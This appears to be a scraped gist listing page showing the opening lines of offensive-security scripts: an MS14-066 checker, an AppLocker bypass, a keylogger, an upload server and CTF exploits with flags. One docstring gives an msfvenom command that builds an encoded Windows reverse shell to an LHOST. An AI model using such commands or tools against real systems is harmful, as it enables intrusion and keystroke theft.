This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
--- ptrace/disasm.c 2014-04-10 10:30:33.000000000 +1200 | |
+++ ptrace/disasm2.c 2014-09-04 12:52:53.425315639 +1200 | |
@@ -4,28 +4,21 @@ | |
try: | |
from ptrace.cpu_info import CPU_I386, CPU_X86_64 | |
- try: | |
- from distorm3 import Decode | |
- if CPU_X86_64: | |
- from distorm3 import Decode64Bits as DecodeBits |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# | |
# @_hugsy_ | |
# | |
# Simple (harmless) to test if target is vulnerable to SChannel() memory corruption - MS14-066 | |
# | |
# It uses the fact that MS added 4 new cipher suites to the patch | |
# TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 | |
# TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 | |
# TLS_RSA_WITH_AES_256_GCM_SHA384 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
""" | |
XOR-encoded shellcode wrapper for Windows x86-32 (works fine on x86-64) | |
Example: | |
$ msfvenom -p windows/shell_reverse_tcp -e x86/shikata_ga_nai \ | |
--format raw -b '\x00\xff' LHOST=192.168.56.1 LPORT=8080 \ | |
2>/dev/null | python xor-payload.py --excel | |
@_hugsy_ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2 | |
# -*- coding : utf-8 -*- | |
# | |
from os import getenv | |
from sys import path, argv | |
from httplib import HTTPConnection | |
from json import loads | |
from pprint import pprint | |
from array import array |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* Trick to run arbitrary command when code execution policy is enforced | |
* (i.e. AppLocker or equivalent). Works on Win98 (lol) and up - tested on 7/8 | |
* | |
* To compile using CL as DLL: | |
* C:> cl.exe RunMe.c /LD /OUT:RunMe.dll | |
* To compile as PE (USE_DLL must be commented out): | |
* C:> cl.exe RunMe.c /OUT:RunMe.exe | |
* | |
* To execute under Windows: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer | |
from SocketServer import ThreadingMixIn | |
from urlparse import urlparse | |
from datetime import datetime | |
import os, sys, tempfile | |
__author__ = "@_hugsy_" | |
__version__ = 0.1 | |
__desc__ = "basic http server to use for quick upload and download" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2.7 | |
# | |
# Merge two or more databases created by LogReqRes plugin for proxenet | |
# | |
import sys, sqlite3 | |
def init_merge_database(cur): | |
try: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
""" | |
Simple UserLand Keylogger for Windows | |
Based on pyHook. | |
@_hugsy_ | |
""" | |
import sys | |
from ctypes import * | |
try: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2 | |
# | |
# $ cat key | |
# BKPCTF{what_is_2015_minus_7547} | |
# | |
import socket, struct, sys, telnetlib, binascii | |
HOST = "simplecalc.bostonkey.party" | |
#HOST = "localhost" | |
PORT = 5400 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2 | |
# | |
# $ cat key | |
# BKPCTF{th3 l4st 1 2 3z} | |
# | |
import socket, struct, sys, telnetlib, binascii, random | |
HOST = "simplecalc.bostonkey.party" | |
HOST = "localhost" | |
PORT = 5500 |